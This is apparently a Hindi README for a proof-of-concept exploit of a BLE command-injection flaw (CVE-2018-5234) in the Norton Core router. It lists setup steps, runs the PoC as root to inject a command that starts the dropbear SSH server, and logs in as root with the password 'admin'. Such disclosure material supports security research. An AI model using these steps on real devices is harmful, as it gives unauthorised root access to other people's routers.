
Norton Core Secure WiFi Router (CVE-2018-5234) में BLE सेवा के माध्यम से कमांड इंजेक्शन प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट शोषण। SSH एक्सेस सेटअप और BlueZ एकीकरण शामिल है।
अधिक जानकारी के लिए पेपर पढ़ें।
शोषण का प्रदर्शन करने के लिए, हम उपयोग करेंगे:
स्क्रिप्ट का उपयोग करने के लिए, हमें सभी निर्भरताओं को पहले से स्थापित करना होगा:
$ pip install -r ./requirements.txt
BlueZ उपयोगिताओं की सहायता से, हमें सुनिश्चित करना चाहिए कि ब्लूटूथ सक्षम है और ठीक से काम कर रहा है।
इंजीनियरिंग पेज तक पहुंच प्रदान करने के लिए राउटर को पुनरारंभ करें।
रूट उपयोगकर्ता की ओर से PoC प्रारंभ करें (ब्लूटूथ के साथ संचालन के लिए आवश्यक) जिसमें कमांड को तर्क के रूप में निष्पादित किया जा रहा है:
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
स्क्रिप्ट के सफलतापूर्वक निष्पादित होने के बाद, हम SSH कनेक्शन के माध्यम से डिवाइस तक पहुंच प्राप्त करते हैं। हम उपयोगकर्ता के रूप में root और पासवर्ड के रूप में admin डालते हैं:
$ ssh [email protected]